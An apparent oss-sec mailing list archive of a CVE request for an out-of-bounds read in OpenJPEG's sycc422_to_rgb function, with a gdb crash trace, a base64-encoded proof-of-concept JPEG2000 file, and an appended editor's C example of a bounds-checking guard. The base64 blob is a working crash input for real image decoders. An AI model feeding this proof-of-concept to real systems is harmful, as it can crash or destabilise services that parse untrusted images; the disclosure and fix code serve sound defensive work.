oss-sec mailing list archives
CVE request - OpenJPEG : Out-Of-Bounds Read in sycc422_to_rgb function
From: winsonliu(刘科) <winsonliu () tencent com>
Date: Mon, 14 Mar 2016 06:51:58 +0000
Hi all,

I found a vulnerability in OpenJPEG. The specific flaw exists within the sycc422_to_rgb function. A specially crafted JPEG2000 image file can cause an out-of-bounds read in OpenJPEG. This issue can be reproduced in the latest version of OpenJPEG (https://github.com/uclouvain/openjpeg, 2016.03.14). The details of this issue are as follows.

---------------------------------
winson@ubuntu:~/Desktop/repo/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...(no debugging symbols found)...done.
(gdb) r -o image.pgm -i oob_sycc422_to_rgb.j2k
Starting program: /home/winson/Desktop/repo/openjpeg/bin/opj_decompress -o image.pgm -i oob_sycc422_to_rgb.j2k
[INFO] Start to read j2k main header (0).
[INFO] Main header has been correctly decoded.
[INFO] No decoded area parameters, set the decoded area to the whole image
[INFO] Header of tile 1 / 97 has been read.
[INFO] Tile 1/97 has been decoded.
[INFO] Image data has been updated with tile 1.

Program received signal SIGSEGV, Segmentation fault.
0x08058a42 in sycc422_to_rgb ()
(gdb) bt
#0  0x08058a42 in sycc422_to_rgb ()
#1  0x08059227 in color_sycc_to_rgb ()
#2  0x0804c49f in main ()
(gdb) x /i $eip
=> 0x8058a42 <sycc422_to_rgb+430>:	mov    (%eax),%ecx
(gdb) i r
eax            0x815c000	135643136
ecx            0x0	0
edx            0x0	0
ebx            0xb7d7ddcc	-1210589748
esp            0xbfff9ed0	0xbfff9ed0
ebp            0xbfff9f38	0xbfff9f38
esi            0x0	0
edi            0x0	0
eip            0x8058a42	0x8058a42 <sycc422_to_rgb+430>
eflags         0x10297	[ CF PF AF SF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x /40xb $eax-0x20
0x815bfe0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x815bfe8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x815bff0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x815bff8:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x815c000:	Cannot access memory at address 0x815c000
---------------------------------

The attachment is the proof-of-concept file.

Alternatively, you can decode the following string using base64 and save the decoded content to a .j2k file.

---------------------------------
/0//UQAvAAAAAACAAAAwgAAAAHsAAAAAAAAAgAAAAIAAAAAAAAAAAAADBwEBBwIBBwIB/1IAEgEA
AAMABQMDAAEzRFVmd3f/XAATQEBISFBISFBISFBISFBISFD/ZABCAAFDcmVhdGVkIGJ5IE9QSlZp
ZXdlciBXaW4zMiAtIE9wZW5KUEVHICB2ZXJzaW9uIDEuMi4wIHdpdGggSlBXTP+QAAoAAAAAAKYA
Af9TAA8BAQUDAwABM0RVZnd3/10AFAFAQEhIUEhIUEhIUEhIUEhIUP9TAA8CAQUDAwABM0RVZnd3
/10AFAJAQEhIUEhIUEhIUEhIUEhIUP+Tz6QgEVBUr8+YKBFQVKMDz4woEVBUoOKAgICAgICAgICA
gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID/2Q==
---------------------------------

CREDIT: This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
Attachment:
oob_sycc422_to_rgb.j2k
Description: oob_sycc422_to_rgb.j2k
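The post above reports a crash inside a 4:2:2 sYCC-to-RGB conversion but does not state the root cause. The example below is added here by the editor and is not OpenJPEG code; it illustrates the class of bug such a routine is exposed to: a 4:2:2 walk over the luma plane consumes one Cb and one Cr sample per pair of luma columns, and if the converter trusts that the chroma planes really have that geometry, a file whose chroma components are declared smaller than the luma component sends the read pointers past the end of the chroma buffers. Everything here (comp_t, image_t, sycc422_dims_ok, sycc422_to_rgb_checked, the constructed test images) is hypothetical and assumes a minimal component layout of width, height, subsampling factors and a data buffer; the guard it shows is a dimension-consistency check placed ahead of the conversion, which is the editor's suggested shape of a fix, not a description of the project's actual patch.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for the fields a 4:2:2 sYCC->RGB conversion depends
 * on. Not OpenJPEG's own component type. */
typedef struct {
    uint32_t w, h;    /* plane dimensions in samples                     */
    uint32_t dx, dy;  /* subsampling factors relative to the image grid  */
    int32_t *data;    /* exactly w*h samples                             */
} comp_t;

typedef struct { comp_t comps[3]; } image_t;   /* 0 = Y, 1 = Cb, 2 = Cr */

static int32_t clamp8(int32_t v) { return v < 0 ? 0 : (v > 255 ? 255 : v); }

/* One pixel of 8-bit full-range sYCC -> RGB with fixed-point BT.601 weights. */
static void sycc_to_rgb(int32_t y, int32_t cb, int32_t cr,
                        int32_t *r, int32_t *g, int32_t *b)
{
    cb -= 128; cr -= 128;
    *r = clamp8(y + ((91881 * cr) >> 16));
    *g = clamp8(y - ((22554 * cb + 46802 * cr) >> 16));
    *b = clamp8(y + ((116130 * cb) >> 16));
}

/* Chroma samples a 4:2:2 walk over a w*h luma plane consumes: one per pair
 * of luma columns, plus one for an odd trailing column, on every row. */
static size_t sycc422_chroma_needed(uint32_t w, uint32_t h)
{
    return (size_t)((w + 1) / 2) * h;
}

/* The guard an unchecked converter lacks: each chroma plane must be the
 * 2:1 horizontally subsampled counterpart of the luma plane. Anything else
 * means the per-pixel walk would step past comps[1] / comps[2]. */
static int sycc422_dims_ok(const image_t *img)
{
    const comp_t *y = &img->comps[0];
    for (int c = 1; c <= 2; c++) {
        const comp_t *ch = &img->comps[c];
        if (ch->dx != 2 * y->dx || ch->dy != y->dy) return 0;
        if (ch->h != y->h || ch->w != (y->w + 1) / 2) return 0;
        if ((size_t)ch->w * ch->h < sycc422_chroma_needed(y->w, y->h)) return 0;
    }
    return 1;
}

/* 4:2:2 conversion with the check in front. Returns 0 on success, -1 if the
 * planes are inconsistent; in that case no sample data is touched. */
static int sycc422_to_rgb_checked(const image_t *img,
                                  int32_t *r, int32_t *g, int32_t *b)
{
    if (!sycc422_dims_ok(img)) return -1;
    const int32_t *y = img->comps[0].data, *cb = img->comps[1].data,
                  *cr = img->comps[2].data;
    uint32_t w = img->comps[0].w, h = img->comps[0].h;
    for (uint32_t row = 0; row < h; row++) {
        uint32_t col;
        for (col = 0; col + 1 < w; col += 2) {      /* two Y share one Cb/Cr */
            sycc_to_rgb(*y++, *cb, *cr, r++, g++, b++);
            sycc_to_rgb(*y++, *cb, *cr, r++, g++, b++);
            cb++; cr++;
        }
        if (col < w) sycc_to_rgb(*y++, *cb++, *cr++, r++, g++, b++); /* odd w */
    }
    return 0;
}

/* Constructed test image (not decoded from a file): yw*yh luma plane,
 * cw*ch chroma planes, every plane filled with a constant sample value. */
static image_t make_image(uint32_t yw, uint32_t yh, uint32_t cw, uint32_t ch,
                          int32_t yv, int32_t cbv, int32_t crv)
{
    image_t img; memset(&img, 0, sizeof img);
    uint32_t dims[3][2] = {{yw, yh}, {cw, ch}, {cw, ch}};
    int32_t vals[3] = {yv, cbv, crv};
    for (int c = 0; c < 3; c++) {
        comp_t *cp = &img.comps[c];
        cp->w = dims[c][0]; cp->h = dims[c][1]; cp->dx = c ? 2 : 1; cp->dy = 1;
        cp->data = malloc(sizeof(int32_t) * (size_t)cp->w * cp->h);
        for (size_t i = 0; i < (size_t)cp->w * cp->h; i++) cp->data[i] = vals[c];
    }
    return img;
}

static void free_image(image_t *img)
{ for (int c = 0; c < 3; c++) free(img->comps[c].data); }

/* Consistent 4x2 luma / 2x2 chroma, mid-gray: returns 0 if every output
 * pixel is (128,128,128), -1 otherwise. */
static int demo_consistent(void)
{
    int32_t r[8], g[8], b[8];
    image_t img = make_image(4, 2, 2, 2, 128, 128, 128);
    int rc = sycc422_to_rgb_checked(&img, r, g, b);
    free_image(&img);
    if (rc != 0) return -1;
    for (int i = 0; i < 8; i++)
        if (r[i] != 128 || g[i] != 128 || b[i] != 128) return -1;
    return 0;
}

/* Header claims 4x2 luma but only 1x1 chroma: the walk would need 4 chroma
 * samples per plane and only 1 exists. Returns 1 if the guard refuses it. */
static int demo_inconsistent(void)
{
    int32_t r[8], g[8], b[8];
    image_t img = make_image(4, 2, 1, 1, 128, 128, 128);
    size_t need = sycc422_chroma_needed(img.comps[0].w, img.comps[0].h);
    size_t have = (size_t)img.comps[1].w * img.comps[1].h;
    int rc = sycc422_to_rgb_checked(&img, r, g, b);
    free_image(&img);
    return need > have && rc == -1;
}

int main(void)
{
    printf("consistent image converts: %s\n", demo_consistent() == 0 ? "yes" : "no");
    printf("short chroma planes refused: %s\n", demo_inconsistent() ? "yes" : "no");
    return 0;
}
```

The point of the guard is that it is derived from the same header fields the walk will trust, so the converter either has exactly the samples it is about to read or never starts; a decoder that computes the chroma geometry from the luma plane and then indexes the chroma buffers without comparing the two is the pattern a crafted component table can drive out of bounds.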
Current thread:
- CVE request - OpenJPEG : Out-Of-Bounds Read in sycc422_to_rgb function 刘科 (Mar 14)
- Re: CVE request - OpenJPEG : Out-Of-Bounds Read in sycc422_to_rgb function cve-assign (Mar 16)